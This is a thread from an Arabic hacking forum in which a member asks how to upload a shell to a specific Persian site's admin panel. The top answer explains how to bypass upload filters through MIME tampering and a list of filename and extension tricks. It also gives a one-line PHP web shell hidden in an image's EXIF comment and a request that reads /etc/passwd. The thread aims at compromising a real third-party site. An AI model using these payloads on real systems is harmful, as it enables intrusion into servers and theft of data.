التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-09-2014, 07:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

. مجاب: اريد طريقة رفع شل جديدة


كما هو واضح بالعنوان لوحة تحكم لسكربت برمجه خاصة لموقع فارسي

وجدت مكانين لرفع الملفات الموقع الاول يقبل ملفات بي اتش بي ولكن عند الرفع يغير الاسم ولا يغير الامتداد يبقى امتداد الملف كما هو بي اتش بي لكن لا يعمل يأتي خطأ
Internal Server Error

المشكله تم رفع شلات كثيرة بعضها مشفر والاخر غير مشفر لدرجة تم رفع شل بيرل ايضا نفس الحكاية حاولت ارفع هتاكسس ولكن مثل ماخبرتكم يغير الاسم الى 13124134434 عشوائي
حاولت ارفع ملف بي اتش بي بداخله كود يعمل هتاكسس جديد ولكن نفس الحكاية

----------------------------------------------

الموقع الاخر رفع صور تمت تجربت اداة tamper Data فيها واداة live http header ايضا دون جدوى مايرضى يرفع الا ملف صور فقط

الحل ؟؟؟




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC hvd] 'vdrm vtu ag []d]m

   

أفضل جواب - كتبه hisokaosomaki
عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة
الحماية حسب نوع الملف
كود PHP:
if($_FILES['userfile']['type'] != "image/jpg"
لتخطي هده الحماية نستعمل تامبر داتا


الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة
كود PHP:
$valid_file_extensions = array(".jpg"".jpeg"".gif"".png"); 
لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا
اقتباس
shell.jpg.php
shell.jpg.PhP
shell.php.xxxjpg
shell.php;.jpg
shell.php%0delete0.jpg
shell.php.test
.phtml
.php3/.php4/.php5

الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة
كود PHP:
$imageinfo getimagesize($_FILES['userfile']['tmp_name']); 
في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق
كود PHP:
<?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>
كما هو موضح في الصورة


الكود معناه ادا وجد متغير او بارميتر اسمه لول نفد مايحتويه المتغير
ثم نرسل امر فتح الملف etc/passwd
اقتباس
www.somesite.com/shellPath/shelleName.php?lol=cat/etc/passwd

و الاستغلال يكون بهده الطريقة



لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري
على كل حال اتمنى ان اكون قد افدتك اخي
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:53 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0